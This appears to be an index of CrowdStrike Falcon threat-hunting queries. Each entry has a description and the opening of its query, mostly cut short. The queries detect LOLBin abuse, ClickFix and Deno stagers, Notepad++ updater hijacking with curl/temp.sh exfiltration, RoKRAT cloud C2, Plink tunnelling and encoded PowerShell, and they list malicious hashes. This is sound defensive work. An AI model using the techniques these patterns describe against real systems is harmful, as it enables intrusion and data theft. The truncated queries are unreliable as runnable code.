Tags: EDR, hunting, intermediate

Hunting Bitsadmin usage

This query implements a multi-hypothesis threat hunting workflow to detect abuse of the Windows Background Intelligent Transfer Service (BITS). It uses a case statement to classify incoming telemetry into four distinct detection hypotheses.

| case {
    #event_simpleName=ProcessRollup2
    AND (ImageFileName=/\\bitsadmin\.exe$/i OR OriginalFilename="bitsadmin.exe")
    AND (
Tags: EDR, hunting, intermediate

Hunting EDR Freeze

Based on the default command line switching behavior found in the EDR-Freeze open source project: https://github.com/TwoSevenOneT/EDR-Freeze?tab=readme-ov-file

// Look for process handles opening Falcon
#event_simpleName=FalconProcessHandleOpDetectInfo FileName="WerFaultSecure.exe"

// Check for command line switching signal
Tags: EDR, hunting, intermediate

Identify Linux Systems Vulnerable to CVE-2025-1146 with Last Logged-On User Information

The query below looks for Linux systems (Linux hosts, Kubernetes (K8s) nodes and containers) that need to be updated against CVE-2025-1146. It is based on the OsVersionInfo event, which the sensor generates every 24 hours, at sensor start, or at sensor update. It attempts to merge in logons with LogonType 2 (interactive) and 10 (remote interactive) to determine the last logged-on user.

// Get OsVersionInfo events; sent by sensor every 24-hours or at sensor start or update
#event_simpleName=OsVersionInfo
 
// Narrow search to only include Linux, Container, and K8 systems
Tags: EDR, detection, intermediate

Identify Shadow SaaS

This query identifies SaaS services supported by Falcon Shield and helps detect which SaaS products are actively used within the environment.

#event_simpleName=DnsRequest DomainName=*
| match(file="shadow-saas.csv", field=[DomainName], column=[Domains], strict=true,mode=glob)
| Category=?Category
| Vendor=?Vendor
Tags: EDR, monitoring, intermediate

Installed Browser Extensions (Aggregate by Extension)

This query will output a table with all installed browser extensions.

// Get browser extension event
#event_simpleName=InstalledBrowserExtension BrowserExtensionId!="no-extension-available"

// Aggregate by event_platform, BrowserName, ExtensionID and ExtensionName
Tags: EDR, hunting, intermediate

Installed Browser Extensions (Hunt Extension Name)

This query will output a table with all installed browser extensions.

// Get browser extension event
#event_simpleName=InstalledBrowserExtension BrowserExtensionId!="no-extension-available"

// Look for string "vpn" in extension name
Tags: EDR, hunting, intermediate

InstallFix on macOS

The InstallFix query is designed to catch the execution patterns of one-liner stagers or initial access scripts that masquerade as legitimate system fixes or installers. It looks for a high-confidence sequence in which a curl command, configured with flags typically used to bypass security checks or silence output, is executed in close temporal proximity (within 1 minute) to a command involving Base64 decoding.

#repo="base_sensor"
| #event_simpleName="ProcessRollup2"
| event_platform="Mac"
| correlate(
Tags: EDR, detection, intermediate

Inventory of Installed Browser Extensions Across Endpoints

The query lists installed browser (Chrome & Edge) extensions across endpoints, normalizes browser names, counts unique systems per extension, adds a Chrome Web Store link, and sorts results to highlight the most common extensions.

#event_simpleName=InstalledBrowserExtension BrowserExtensionId!="no-extension-available"
| groupBy([event_platform, BrowserName, BrowserExtensionId, BrowserExtensionName], function=([count(aid, distinct=true, as=TotalEndpoints)]))
| format("[See Extension](https://chromewebstore.google.com/detail/%s)", field=[BrowserExtensionId], as="Chrome Store Link")
| sort(order=desc, TotalEndpoints, limit=1000)
Tags: EDR, hunting, intermediate

IOC search | PTC Windchill & FlexPLM vulnerability

This query checks for Indicators of Compromise (IOCs) related to a critical Remote Code Execution vulnerability in PTC Windchill and FlexPLM. It tracks the creation or modification of specific Java source files that an attacker may use to intercept requests, manipulate data streaming, or execute unauthorized system updates. Reference: https://support.eacpds.com/hc/en-us/article_attachments/47430019070996

case {
  #event_simpleName = /.*FileWritten/i
  | FileName = /GW\.class/i or FileName = /Gen\.class/i or FileName = /dpr_.*\.jsp/i;
  #event_simpleName = /.*FileWritten/i
Tags: EDR, hunting, intermediate

JAR files executed from %AppData%

This query detects whether a JAR file was executed from the %AppData% folder.

#event_simpleName=ProcessRollup2 
| ImageFileName=/javaw.exe/i CommandLine=/appdata/i
| table([aid, @timestamp, #event_simpleName, ImageFileName, SHA256HashData], limit=1000)
Tags: EDR, hunting, intermediate

JAR files written to %AppData%

This query detects whether a JAR file was written to the %AppData% folder.

#event_simpleName=JarFileWritten 
| TargetFileName=/\\AppData\\/i
| table([aid, @timestamp, TargetFileName, SHA256HashData], limit=1000)
Tags: EDR, hunting, intermediate

Lateral Movement via SMB

Detects lateral movement using SMB protocol by correlating process events with network connections on port 445.

FileName = "cmd.exe" OR FileName = "powershell.exe"
| join(
    { NetworkEvent
      | DestinationPort = 445
Tags: EDR, lateral-movement, smb, intermediate

LeakNet Campaign: Deno Runtime & Klist Suspicious Execution Detection

Detects indicators of the LeakNet campaign (analyzed by ReliaQuest, March 2026), which uses ClickFix, a social engineering tactic in which compromised websites display fake error dialogs that coerce users into manually pasting and executing a malicious PowerShell/CMD command. This delivers a portable Deno (JavaScript runtime) binary to user-writable directories, which then runs malicious payloads entirely in memory, avoiding disk-based detection. The query targets the post-delivery kill chain: Deno execution from AppData/Temp/ProgramData paths, klist.exe usage from interactive shells indicating Kerberos ticket harvesting, Deno spawning reconnaissance and living-off-the-land binaries, and dangerous Deno runtime flags or remote code fetch patterns. A noise reduction filter excludes Deno running from standard developer or Program Files paths.

#event_simpleName=ProcessRollup2
| (
    /* ── Clause 1: Deno launched from user-writable locations ── */
    (
Tags: EDR, hunting, detection, intermediate

List of attachments sent from Outlook

#event_simpleName=ProcessRollup2
| CommandLine=/content.outlook/i
| aid=?aid
| ImageFileName=/(\/|\\)(?<FileName>\w*\.?\w*)$/
Tags: EDR, hunting, intermediate

LOLBin Certutil

This query detects the use of certutil.exe.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/certutil.exe/i and CommandLine=/(https?:)/i
Tags: EDR, hunting, intermediate

LOLBin Mshta

This query detects the use of mshta.exe.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/mshta.exe/i
| CommandLine=/mshta(?:\.exe)?\"?\s+\"?(?<HtaPath>(?:.*?\.hta|(?=\").*?(?=\")|.*?(?=(?:\s|$))))/i
| HtaPath=/(?<HtaFolder>.*)(\\\\|\/)/i
Tags: EDR, hunting, intermediate

LOLBin Msiexec

This query detects the use of Msiexec.exe.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/msiexec.exe/i and CommandLine=/http/i
Tags: EDR, hunting, intermediate

LOLBin Regsvr32

This query detects the use of Regsvr32 when it has loaded scrobj.dll.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win
| ImageFileName=/regsvr32.exe/i CommandLine=/scrobj.dll/i CommandLine=/i:/i
Tags: EDR, hunting, intermediate

LOLBin Rundll32

This query detects the use of Rundll32 from parents that are known for misuse.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/rundll32.exe/i
| in(ParentBaseFileName, values=["cmd.exe","winword.exe","powerpnt.exe","excel.exe","outlook.exe","mshta.exe","cscript.exe","wscript.exe"])
Tags: EDR, hunting, intermediate

LOLBin WMIC

This query detects the use of WMIC.

in(#event_simpleName, values=["ProcessRollup2","ProcessBlocked"])
| event_platform=Win and ImageFileName=/wmic.exe/i
Tags: EDR, hunting, intermediate

Malicious Chrome Extension FreeVPN-One Detection

This logic detects the presence of the malicious Chrome extension FreeVPN[.]One by identifying its unique extension ID across installed browsers. It further correlates this presence with network communications initiated by the extension to suspicious or untrusted domains. By combining extension enumeration with traffic analysis, the detection ensures high fidelity with minimal false positives. This layered approach strengthens visibility into malicious browser add-ons masquerading as VPN tools.

defineTable(query={#event_simpleName=InstalledBrowserExtension
| case {
    BrowserExtensionId=/jcbiifklmgnkppebelchllpdbnibihel/iF;
    BrowserExtensionName=/FreeVPN/iF
Tags: EDR, hunting, intermediate

MongoDB Processes on Windows & Linux Hosts (CVE-2025-14847)

This query identifies Windows and Linux hosts running MongoDB processes (mongod and mongos).

#event_simpleName=ProcessRollup2
| (event_platform=Win AND ImageFileName=/mongod\.exe|mongos\.exe/i) OR (event_platform=Lin AND ImageFileName=/mongod|mongos/i)
| table([@timestamp, aid, ComputerName, UserName, ImageFileName])
Tags: EDR, hunting, intermediate

New API Keys within the Falcon Platform

This query provides a list of newly created API Keys, including relevant details such as Client Name and Client ID.

#event.dataset = falcon.cloud
| OperationName = CreateAPIClient
| user.id = *
| "Client Name" := rename(Attributes.name)
Tags: EDR, monitoring, intermediate

New installed Sensors

This query loads host inventory data from aid_master_main.csv, enriches it with details from aid_master_details.csv, and outputs a cleaned, formatted table of host information.

readfile("aid_master_main.csv")
| test(FirstSeen > start())
| cid=?cid
| ProductType match {
Tags: EDR, monitoring, intermediate

Notepad++ supply chain attack

This query detects a state-sponsored supply chain attack where the legitimate Notepad++ updater (gup.exe) is hijacked to download the Chrysalis backdoor. It identifies the attack by spotting unauthorized network connections from the updater, malicious DLL side-loading (e.g., BluetoothService.exe loading log.dll), and data exfiltration commands involving curl and temp.sh.

| case {
#event_simpleName=/DNS/iF ContextBaseFileName=/^gup\.exe$/iF DomainName!=/github.com|notepad-plus-plus.org|.globalsign.com|release-assets.githubusercontent.com/iF| DetectionLogic := "GUP beacon to C2C" | Indicator := DomainName | Risk := "HIGH";
in(field="SHA256HashData", values=["02368c6b62cb392dddd35cfc6cb8c1154f7ebdceb9fb559cefc301982d6fbbf9","0dcd846cdfdc793fab39a3c9860e0f6ab68cdbdcf4b03a87e8a02df0d3e1249f","5dd766a7a378c97eb8c9fe9a4bff678e3c9a05386911f4296e094407b99c23d2","6a7a8aa91109c25d57fe2ca71c150ca09afc1bf10c98376adf959dbc91010394","a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9","078a9e5c6c787e5532a7e728720cbafee9021bfec4a30e3c2be110748d7c43c5","0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd","2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924","3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad","4a52570eeaf9d27722377865df312e295a7a23c3b6eb991944c2ecd707cc9906","4c2ea8193f4a5db63b897a2d3ce127cc5d89687f380b97a1d91e0c8db542e4f8","77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e","7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd","831e1ea13a1bd405f5bda2b9d8f2265f7b1db6c668dd2165ccc8a9c4c15ea7dd","8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e","9276594e73cda1c69b7d265b3f08dc8fa84bf2d6599086b9acc0bb3745146600","a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9","b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3","e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda","f4d829739f2d6ba7e3ede83dad428a0ced1a703ec582fc73a4eee3df3704629a","fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a"],ignoreCase=true)| DetectionLogic := "Malicious SHA256 Hash Execution" | Indicator := SHA256HashData | Risk := "HIGH";
in(field="SHA1HashData", values=["06a6a5a39193075734a32e0235bde0e979c27228","07d2a01e1dc94d59d5ca3bdf0c7848553ae91a51","0d0f315fd8cf408a483f8e2dd1e69422629ed9fd","13179c8f19fbf3d8473c49983a199e6cb4f318f0","21a942273c14e4b9d3faa58e4de1fd4d5014a1ed","259cd3542dea998c57f67ffdd4543ab836e3d2a3","2a476cfb85fbf012fdbe63a37642c11afa5cf020","2ab0758dda4e71aee6f4c8e4c0265a796518f07d","3090ecf034337857f786084fb14e63354e271c5d","46654a7ad6bc809b623c51938954de48e27a5618","4c9aac447bf732acc97992290aa7a187b967ee2c","573549869e84544e3ef253bdba79851dcde4963a","6444dab57d93ce987c22da66b3706d5d7fc226da","73d9d0139eaf89b7df34ceeb60e5f8c7cd2463bf","7e0790226ea461bcc9ecd4be3c315ace41e1c122","813ace987a61af909c053607635489ee984534f4","821c0cafb2aab0f063ef7e313f64313fc81d46cd","8e6e505438c21f3d281e1cc257abdbf7223b7f5a","90e677d7ff5844407b9c073e3b7e896e078e11cd","94dffa9de5b665dc51bc36e2693b8a3a0a4cc6b8","9c0eff4deeb626730ad6a05c85eb138df48372ce","9c3ba38890ed984a25abb6a094b5dbf052f22fa7","9df6ecc47b192260826c247bf8d40384aa6e6fd6","9fbf2195dee991b1e5a727fd51391dcc2d7a4b16","bd4915b3597942d88f319740a9b803cc51585c4a","bf996a709835c0c16cce1015e6d44fc95e08a38a","c68d09dd50e357fd3de17a70b7724f8949441d77","ca4b6fe0c69472cd3d63b212eb805b7f65710d33","d0662eadbe5ba92acbd3485d8187112543bcfbf5","d7ffd7b588880cf61b603346a3557e7cce648c93","da39a3ee5e6b4b0d3255bfef95601890afd80709","defb05d5a91e4920c9e22de2d81c5dc9b95a9a7c","f7910d943a013eede24ac89d6388c1b98f8b3717"],ignoreCase=true)| DetectionLogic := "Malicious SHA1 Hash Execution" | Indicator := SHA1HashData | Risk := "HIGH";
Tags: EDR, hunting, intermediate

OS Platform ratio

This query aggregates SensorHeartbeat events by operating system platform to show the relative distribution of endpoints per OS. It is well suited for visualization as a pie chart, providing a quick overview of platform coverage and identifying imbalances or unexpected OS presence in the environment.

#event_simpleName = SensorHeartbeat
// Collapse to one row per host and platform, then count hosts per platform
| groupBy([aid, event_platform])
| groupBy([event_platform])
Tags: EDR, monitoring, intermediate

Phishing - List of links opened from Outlook

#event_simpleName=ProcessRollup2 
| aid=?aid ImageFileName=/\\outlook\.exe/i
| regex("(?<FileName>[^\\/|\\\\]*)$", field=ImageFileName, strict=false)
| join(
Tags: EDR, hunting, intermediate

Powershell Command Length Anomaly Detection

This query establishes a 7-day baseline of average PowerShell command lengths for each host. It then compares this baseline to the average command length of the last 24 hours. The query identifies hosts with a significant percentage increase in command length, which can be an indicator for obfuscation, fileless execution, or other malicious activities associated with "Living off the Land" techniques.

#event_simpleName=ProcessRollup2
| ImageFileName=/\\(powershell(_ise)?|pwsh)\.exe/i
| CommandLength := length("CommandLine") | CommandLength>0
| aid=?AID
Tags: EDR, detection, intermediate

Powershell Downloads

This query detects powershell downloads using `Start-BitsTransfer`, `Invoke-WebRequest`, or `System.Net.WebClient`.

#event_simpleName=CommandHistory
| CommandHistory=/Invoke\-WebRequest|Net\.WebClient|Start\-BitsTransfer/i
| regex("(?<URL>https?://[^'\"]+)", field=CommandHistory)
| replace("https://", with="", field=URL, as=ShortURL)
Tags: EDR, hunting, intermediate

Rare Remote Ports in Network Connections

The query analyzes IPv4 network connection events, counts occurrences per remote port, calculates their percentage of total connections, and lists only ports representing less than 10% of the traffic.

#event_simpleName=NetworkConnectIP4
| groupBy([RemotePort], function=count(as=count), limit=max) 
| [sum(count, as=total), sort(field=RemotePort, order=ascending, limit=20000)] 
| percent := 100 * (count / total) 
Tags: EDR, hunting, intermediate

Rare windows shell parent process

This hunting query is designed to detect rare shell parent processes.

#event_simpleName=ProcessRollup2 event_platform=Win
| case { in(field=FileName, values=["powershell.exe", "cmd.exe", "pwsh.exe"]) | IsChild := "1"; * | IsChild := "0" }
| case { IsChild = "1" | ProcId := ParentProcessId | ChildProcess := FileName | ChildCommandLine := CommandLine;
IsChild = "0" | ProcId := TargetProcessId | ParentCommandLine := CommandLine | ParentFileName := FileName | ParentFilePath := FilePath | ParentSHA256HashData := SHA256HashData; }
Tags: EDR, hunting, intermediate

Recent RTR Sessions

List of the recent Real Time Response sessions that were started.

// Get RTR Start events
#repo=detections #event_simpleName=Event_RemoteResponseSessionStartEvent

// Rename Agent ID value
Tags: EDR, monitoring, intermediate

Remediation - Host Contained

This query lists all isolated devices and identifies who initiated the isolation.

#repo=detections EventType = "Event_ExternalApiEvent" ExternalApiType = "Event_UserActivityAuditEvent" OperationName=containment_requested cid=?{cid="*"}
| rename(field=AgentIdString,as=aid)
| join({
$falcon/investigate:aid_base()
Tags: EDR, monitoring, intermediate

Remote Interactive Logons (RDP)

Identifies remote interactive logons on a specific endpoint. The query filters UserIdentity events for LogonType=10, which typically indicates Remote Desktop or similar remote access sessions. Results are scoped by the provided aid and display up to 1,000 events, including timestamp, username, user principal, and the logon server. Useful for detecting and reviewing remote access activity during investigations or routine monitoring.

#event_simpleName=UserIdentity
| aid=?aid LogonType=10
| table([@timestamp, UserName, UserPrincipal, LogonServer], limit=1000)
Tags: EDR, hunting, intermediate

Remote Port Forwarding via Plink - Unauthorized RDP Tunneling Detection

Detects the use of Plink (PuTTY Link) to establish remote port forwarding tunnels, specifically targeting traffic redirected to port 3389 (RDP). This technique is frequently used by threat actors for lateral movement or to bypass firewall restrictions by tunneling RDP over SSH.

#event_simpleName=ProcessRollup2
| ImageFileName=/\\plink(64)?\.exe$/i
| CommandLine=/\s-(R|L).*:3389/i
| table([aid, ComputerName, UserName, ImageFileName, CommandLine, ParentBaseFileName])
Tags: EDR, hunting, intermediate

ROKRAT Malware APT 37

RoKRAT malware: injection and steganography. High-level TTPs:
- Initial Access: malicious .lnk files within compressed archives.
- Execution & Persistence: PowerShell/BAT-driven staged loaders with XOR decryption.
- Defense Evasion: process injection into trusted Windows binaries and payload concealment via steganography.
- Command & Control: abuse of pCloud, Yandex Disk, and Dropbox APIs with embedded tokens to blend with legitimate traffic.

in(field="#event_simpleName", values=["*ProcessRollup2", "DnsRequest", "*Written"])
| case {
    in(field="SHA256HashData", values=["3fa06c290c477c133ca58512c7852fc998632721f2dc3a0984f18fbe86451e18","ccb6ca4cb385db50dad2e3b7c68a90ddee62398edb0fd41afdb793287cfbe8e6","9eca7ab62e3ad40b79116ad713462e3ae4d9610345952e5dd279f0b481870d4f","7ee4326c5d0e6a30c1a9bdec045d670758fa1b36477992d61b03cb270113b196","e27467f7fdfa721e917384542ce10cc6108dfd78df14e23872cf8df916e0b8c6","7d514021c472e6e17f587ed30555d3f120653e6c7f8dc25d2331514b92ffd7bc","41d9b6d8cf0fff85bf35327d4b94db629cd9f754c487672911b7f701fe8c5539","6a2d984ef3fa0de9b9feb5f558381201e6dff42ef5efe4867fb24e47c6a2aade","bf7d5020dcd7777509b7b542255814cd61bfb1599d532dd2fdbb50de2ad70bc5","90bf1f20f962d04f8ae3f936d0f9046da28a75fa2fb37f267ff0453f272c60a0","ca56720610400d6da773ffa4cce5b2447d4a665087604c9c6e1c9e71c048ccfc"],ignoreCase=true);
    in(field="DomainName", values=["*api.pcloud.com","*cloud-api.yandex.net","*dropboxapi.com"], ignoreCase=true);
Tags: EDR, hunting, intermediate

Search for oldest devices

A query to get the age of devices that have the Falcon sensor installed.

#event_simpleName = SensorHeartbeat
| in(field=event_platform, values=[?Platform])
| ComputerName like ?ComputerName
| aid = ?aid
Tags: EDR, monitoring, intermediate

Sensor Version Adoption Trend

Visualizes the daily distribution of Sensor versions across the environment. It groups versions by Major and Minor releases (e.g., 6.45) to monitor the rollout of updates and identify legacy versions.

#event_simpleName=OsVersionInfo 
| AgentVersion=/(?<ShortAgentVersion>\d+\.\d+\.)/
| timeChart(ShortAgentVersion,span="1d")
Tags: EDR, monitoring, intermediate

SOC Efficiency Metrics

Summarizes CrowdStrike Falcon detections across hosts, showing key lifecycle metrics such as tactic, technique, severity, detection state, and resolution time. Useful for SOC performance tracking, identifying detection patterns, and monitoring time-to-close for incidents.

// Get events of interest
#repo=detections 
| in(field="ExternalApiType", values=[Event_UserActivityAuditEvent, Event_EppDetectionSummaryEvent])
Tags: EDR, monitoring, intermediate

Suspicious PowerShell Execution

This query identifies suspicious PowerShell execution patterns, including encoded commands and unusual parent processes, which could indicate malicious activity.

#event_simpleName=ProcessRollup2 ImageFileName=/\\powershell\.exe/i
// -e, -ec, -en, -enc and -encodedcommand are all accepted abbreviations of -EncodedCommand;
// a trailing caret is tolerated for cmd.exe-style escaping
| CommandLine=/\s-(e|ec|en|enc|encodedcommand)\^?\s/i
| join({#event_simpleName=UserIdentity}, field=AuthenticationID, include=[UserName])
| table([aid, UserName, ParentImageFileName, ImageFileName, CommandLine])
Tags: EDR, hunting, intermediate

Suspicious Registry Modifications

This query detects suspicious registry modifications that could indicate persistence mechanisms or system configuration tampering by attackers.

#event_simpleName=RegGenericValue 
| RegObjectName=/\\(Run|RunOnce|Winlogon|AppInit_DLLs|Image File Execution Options)/i
| RegValueName!=/^(ctfmon|SecurityHealth|OneDrive)$/i
| join({#event_simpleName=UserIdentity}, field=AuthenticationID, include=[UserName])
Tags: EDR, hunting, intermediate

Systems Initiating Connections to a High Number of Ports

Detects hosts that establish network connections across a large number of unique ports within a given period. This behavior may indicate port scanning, network reconnaissance, or potentially malicious enumeration activity originating from a compromised host or unauthorized tool. The query aggregates by host and process, listing associated filenames, command lines, and user context to assist with triage.

#event_simpleName=/^(NetworkConnectIP4|ProcessRollup2)$/
| falconPID:=TargetProcessId | falconPID:=ContextProcessId
| UserID:=UserSid | UserID:=UID
| selfJoinFilter(field=[aid, falconPID], where=[{#event_simpleName=NetworkConnectIP4}, {#event_simpleName=ProcessRollup2}])
Tags: EDR, hunting, intermediate

User Logoff Activity

Table of all UserLogoff events including UserName, ComputerName, aip, LocalIP and Domain.

#event_simpleName=UserLogoff
| groupBy([UserName, name, aid, aip, ComputerName, event_platform, LocalIP, LogonDomain, LogonServer, LogonType], function=[count(@timestamp), selectLast([@timestamp])])
| table([@timestamp, UserName, ComputerName, aid, aip, event_platform, LocalIP, LogonDomain, LogonType], limit=20000)
Tags: EDR, monitoring, intermediate

User Logon Activity

Table of all user logons.

#event_simpleName=UserLogon
| groupBy([UserName, name, aid, aip, ComputerName, event_platform, LocalIP, LogonDomain, LogonServer, LogonType], function=[count(@timestamp), selectLast([@timestamp])])
| table([@timestamp, UserName, ComputerName, aid, aip, event_platform, LocalIP, LogonDomain, LogonType], limit=20000)
Tags: EDR, monitoring, intermediate

User Logon Details (Time, Type, Location, Last Password Change)

This query will output a table of recent user logons with context information:
- Timestamp
- UserName
- SID
- LogonType
- UserIsAdmin (Y/N)
- PasswordLastSet
- Location

#event_simpleName=UserLogon UserSid=S-1-5-21-*
| in(LogonType, values=["2","10"])
| ipLocation(aip)
| case {UserIsAdmin = "1" | UserIsAdmin := "Yes" ;
Tags: EDR, hunting, monitoring, intermediate

Users creating Network Shares

This query shows all newly created network shares.

#event_simpleName="NetShareAdd"
| wildcard(field=UserName, pattern=?UserName, ignoreCase=true)
| wildcard(field=ComputerName, pattern=?ComputerName, ignoreCase=true)
| groupBy([ComputerName, UserName, ShareName, SharePath, ShareData, @timestamp])
Tags: EDR, hunting, intermediate

Windows Store Installs

This query displays all applications installed from the Microsoft Store on a machine. It extracts the package name from the file path and groups the results by computer name and package base. It also allows known-good file paths and packages to be filtered out to reduce noise in the results.

| regex("WindowsApps\\\\(?<PackageName>[^\\\\]+)\\\\", field=FilePath, strict=true)
| regex("^(?<PackageBase>[^_]+)", field=PackageName, strict=false)
| ComputerName=~wildcard(?ComputerName, ignoreCase=true)
| PackageBase=~wildcard(?PackageBase, ignoreCase=true)
Tags: EDR, monitoring, intermediate